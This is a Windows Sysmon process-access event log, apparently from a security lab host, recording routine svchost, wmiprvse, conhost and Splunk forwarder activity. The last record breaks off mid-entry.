{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3752,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0240-5F25-0000-00107DA50500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3753,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3754,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3755,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3756,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.204\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.204","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3757,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.204\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.204","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3758,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.204\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.204","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3759,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.204\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.204","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3760,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.204\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 